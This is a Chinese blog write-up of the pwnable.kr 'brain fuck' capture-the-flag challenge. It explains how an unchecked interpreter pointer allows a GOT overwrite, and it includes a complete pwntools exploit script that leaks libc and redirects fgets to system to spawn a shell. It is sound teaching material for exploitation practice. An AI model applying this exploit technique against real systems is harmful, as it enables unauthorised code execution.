pwnable 笔记 Rookiss - brain fuck - 150 pt

最新推荐文章于 2024-08-19 10:49:04 发布
最新推荐文章于 2024-08-19 10:49:04 发布
阅读量3k 收藏 1
点赞数
分类专栏: pwn 知识总结 pwnable.kr 题解 文章标签: pwn GOT覆写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SmalOSnail/article/details/53679546
版权
pwn 同时被 3 个专栏收录
35 篇文章 2 订阅
订阅专栏
pwnable.kr 题解
20 篇文章 18 订阅
订阅专栏
知识总结
14 篇文章 0 订阅
订阅专栏

题目分析

根据题目提示,程序是一个BrainF**k的解释器,用IDA Pro静态分析程序,程序结构很简单,如下图:
struct

main函数

IDA1
IDA2

do_brainfuck函数

fck
如上图,在do_brainfuck中可以看到程序一共支持brainf**k的6种操作>,<,+,-,.,,,具体含义如下表:

操作含义
>p += 1
<p -= 1
+(*p) += 1
-(*p) -= 1
.putchar(*p)
,getchar(p)

注:p是指向堆空间的一个指针

指针p存在bss段,如下图:
heap

既然这个指针在堆中,那么它距离got表很近,而上述的操作中正好有移动指针的操作,利用>,<前后移动指针就可以到达内存中任意区域,再利用.,,操作就可以实现对内存的读取与改写。

具体分析后发现指针p指向的区域距离GOT表中最后一个函数putchar只有112字节,我们很容易实现对GOT表的覆写。

所以这道题目主要考察GOT覆写技术

解题思路

因为最终的目的是要拿到一个shell,所以要想办法构造并执行system("/bin/sh\0")

system函数可以通过泄露内存得到,而"/bin/sh"只能从标准输入中得到

程序中有一个fgets函数,但是fgets到的字符串用于在do_brainfuck中覆写GOT表了,所以只能想别的办法找其他可以利用的函数:
func

这里挑选memsetfgets两个函数作为覆写对象正合适,原因如下:

  • puts函数不好控制参数,第一个参数为固定的字符串

  • memset的第一个参数正好可以存放我们输入的字符串"/bin/sh"

call

  • fgets紧随memset,并且第一个参数与memset相同

所以解题的大致思路为:

  • 将menset覆写为gets,从stdin中读入"/bin/sh\0"

  • 将fgets覆写为system,执行system("/bin/sh\0")获取shell

解题过程

  • 泄露putchar函数真实地址

  • 根据题目给的libc计算其他函数真实地址

  • 覆写GOT表中putchar函数为main函数地址

  • 覆写GOT表中fgets函数为system函数地址

  • 覆写GOT表中memset函数为gets函数地址

  • 返回main函数,getshell

Talk is cheap, show me your code. ~ Linus

具体的解题过程直接看代码吧

解题脚本

#!/usr/bin/python
__author__ = "TaQini"
from pwn import *

# context.log_level = 'debug'
# p = process('bf')
# libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('bf_libc.so')
p = remote('pwnable.kr',9001)

def back(n):
    return '<'*n
def read(n):
    return '.>'*n
def write(n):
    return ',>'*n

putchar_got = 0x0804A030
memset_got  = 0x0804A02C
fgets_got   = 0x0804A010
ptr         = 0x0804A0A0

# leak putchar_addr
payload =  back(ptr - putchar_got) + '.' + read(4) 
# overwrite putchar_got to main_addr
payload += back(4) + write(4) 
# overwrite memset_got to gets_addr
payload += back(putchar_got - memset_got + 4) + write(4) 
# overwrite fgets_got to system_addr
payload += back(memset_got - fgets_got + 4) + write(4) 
# JUMP to main
payload += '.'

p.recvuntil('[ ]\n')
#gdb.attach(p)
p.sendline(payload)
p.recv(1) # junkcode

putchar_libc = libc.symbols['putchar']
gets_libc    = libc.symbols['gets']
system_libc  = libc.symbols['system']

putchar = u32(p.recv(4))
log.success("putchar = "+ hex(putchar))

gets    = putchar - putchar_libc + gets_libc
log.success("gets = "   + hex(gets))

system  = putchar - putchar_libc + system_libc
log.success("system = " + hex(system))

main    = 0x08048671
log.success("main = "   + hex(system))

p.send(p32(main))
p.send(p32(gets))
p.send(p32(system))

p.sendline('//bin/sh\0')
p.interactive()

More

这题的关键在于选择合适的函数去覆写,先从大局出发,确定方向,不过细节也很重要,gdb attach 在调试exp过程中起到了很大的作用,还有pwntools的context.log_level = 'debug'功能。

ok

恩..调试时的耐心也很重要… never give up

TaQini852
关注
专栏目录
ChatGPT和GPT-4带你选笔记本电脑
herosunly的博客
04-11 14万+
本文介绍核心内容为用好ChatGPT之准确分配角色,希望对学习和使用ChatGPT的同学们有所帮助。为了兼顾质量和速度,本专栏的更新频率为一周一到两更。 文章目录 1. 前言 2. 使用ChatGPT给出选择建议 3. 使用GPT-4给出选择建议
[RK3399][Android7.1] 移植笔记 --- 9.7寸eDP显示屏添加
热门推荐
Kris Fei's blog
06-28 1万+
Platform: RK3399 OS: Android 7.1 Kernel: v4.4.83 由于此屏在rk3288平台上使用过,原以为接上去就可以点亮,谁知道花了一天多时间折腾,最后还是发现是自己的大意造成的,ORZ… 原理图: LCD: 背光: EDP屏硬件直接按照上电时序连接好控制,软件无需干预。 EDP_HPD pin可接可不接。 所以要做的就是配...
Brainfuck:一个简单的 Brainfuck JS 解释器
07-23
脑残 一个简单的 Brainfuck JS 解释器 什么是脑筋急转弯? “Brainfuck 是一种以极简主义着称的深奥编程语言。该语言仅由八个简单的命令和一个指令指针组成。然而,它被证明是图灵完备的。它旨在挑战和娱乐程序员,而不是被制造出来适合实际使用。它由 Urban Müller 于 1993 年创建。该语言的名称是对粗俗术语“brain fuck”的引用,它指的是非常复杂或不寻常的事情,以至于超出了人们的理解范围”( )。 命令是什么? 脑残 C > ++ptr; < --ptr; + ++*ptr; - --*ptr; [ 而 (*ptr) { ] } . putchar(*ptr); , *ptr = getchar();
pwnable.kr】 brainfuck
weixin_30530523的博客
08-03 149
pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownload : http://pwnable.kr/bin/bf_libc.so Running at : nc pwnable.kr 9001 =======================...
Brainfuck 开源项目教程
最新发布
gitblog_00553的博客
08-19 475
Brainfuck 开源项目教程 brainfuckCollection of BF interpreters/translators in C/C++/ASM/JS/Python/Rust + others项目地址:https://gitcode.com/gh_mirrors/br/brainfuck 项目介绍 Brainfuck 是一个极简的编程语言,由瑞士物理学生 Urban Müller...
pwnablebrainfuck
pwd_3的博客
09-29 463
问题分析程序没有对p的访问空间做限制,导致可以任意内存读写,在.bss段前面是存放got的地方。基本思路是:先读取got中的值泄露libc地址,再根据bf_libc.so计算其他函数偏移。接下来是写,覆盖原有got值为指定函数地址来getshell遇到问题最开始想覆盖putchar的got值为system的地址,但无法控制system的参数。思维僵化 真的是,怎么就没想到覆盖成__start的地址,
pwnable brain fuck(bss段的用途)
九层台
09-26 650
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
pwnable.kr - brain fuck
加号减减号的博客
03-06 840
题目简介 分析 writeup 题目简介 Brain fuckpwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
[RK3399][Android7.1] 移植笔记 --- DSI转LVDS芯片TC358775添加
Kris Fei's blog
12-19 1万+
Platform: RK3399 OS: Android 7.1 Kernel: v4.4.83 首先我想感谢下Rockchip闭工和Toshiba林工在技术上的大力支持,没有他们帮忙,调试周期将会拉更长。 背景: 产品需要接一块LVDS屏幕,rk3399并没有带LVDS接口,因此使用东芝的DSI-&amp;amp;amp;amp;gt;LVDS芯片TC358775来输出LVDS信号。 因此驱动里配置的就是MIPI DSI了。 ...
[RK3399][Android7.1] 调试笔记 --- USB type-c插入后无法识别到
Kris Fei's blog
06-25 1万+
Platform: RK3399 OS: Android 7.1 Kernel: v4.4.83 现象: 用update.img制作了一个升级包之后可以升级,但是无法识别到type-c。 Log: 插上usb后提示: [ 35.192416] rk818-charger: pmic: plug in [ 35.679779] phy phy-ff770000.sy...
Brain-Fuck:只是一个剧本
03-11
脑干- 只是一个脚本:P 钥匙 描述 , 获得输入字符。 。 打印数据字符。 ` 通过将每个字符的asci代码设置在“图形”下方来获取输入字符串。 < 将头/指针向左移动。 > 向右移动头/指针。 伏特 向下移动头/指针。 ^ 将头/指针向上移动。 [ 循环遍历代码,直到当前头/指针的数据为0。 ] 循环结束。 -- 从当前表头/指针的数据中减去1,则为0,然后将其变为255。 + 将1添加到当前表头的数据/指针的数据,即255,然后将其变为0。 程式码范例 V\`[.^] 这将得到一个字符串并向后打印出来! V\`[^][.V] 这做同样的事情,但可以正常打印!
pwnable.kr brain fuck
r250414958的博客
05-03 323
老样子,先审题 给了两个文件,先下下来 bf拖ida里康康,使用F5大法 int __cdecl main(int argc, const char **argv, const char **envp) { size_t i; // [esp+28h] [ebp-40Ch] char s[1024]; // [esp+2Ch] [ebp-408h] unsigned int v6; ...
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 365
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
pwnable BrainFuck,GOT表重写
nibiru_holmes的博客
03-10 1186
题目链接:http://pwnable.kr/play.php BrainFuck是什么鬼,百度一下..... Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 其实就是闲着没事做出来的一种语言。 看看
pwnable.kr brainfuck writeup
jmp esp
03-28 1783
题目I made a simple brain-fuck language emulation program written in C. The [ ] commands are not implemented yet. However the rest functionality seems working fine. Find a bug and exploit it to get a
brain_fuck
jiuweideqixu的博客
08-23 564
bss段和got.plt段之间的距离为:A0A0-A030=0x70=112。 main函数 int __cdecl main(int argc, const char **argv, const char **envp) { size_t i; // [esp+28h] [ebp-40Ch] char s[1024]; // [esp+2Ch] [ebp-408h] unsigned int v6; // [esp+42Ch] [ebp-8h] v6 = __read...
Brainfuck
Tiko.T的部落格
04-25 3957
Brainfuck 是一门非常简单甚至可以说是最简单的编程语言,wikipedia。 它的语法由一个8个字符的字符集组成,即&gt;&lt;+=.,[]八个字符。brainfuck的模型还包括一个以字节为单位、被初始化为零的数组、一个指向该数组的指针(初始时指向数组的第一个字节)、以及用于输入输出的两个字节流。 这八个字符每一个都是一条指令: &gt; 指针加一 &lt; ...
brainfuck 一览
AdenDeng的专栏
10-21 681
This is My Experience of Using brainfuck for 30 Minutes A Quick Introduction According to wikipedia: “Brainfuck is an esoteric programming language noted for its extreme minimalism. The language
MIT线性代数公开课笔记-行图像与列图像解析
“线性代数-笔记.pdf”是麻省理工学院教授Gilbert Strang的线性代数公开课笔记,涵盖了线性代数的基础知识,包括矩阵理论、方程组、向量空间、行列式、特征值、相似矩阵和正定矩阵等内容。 线性代数是数学的一个...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值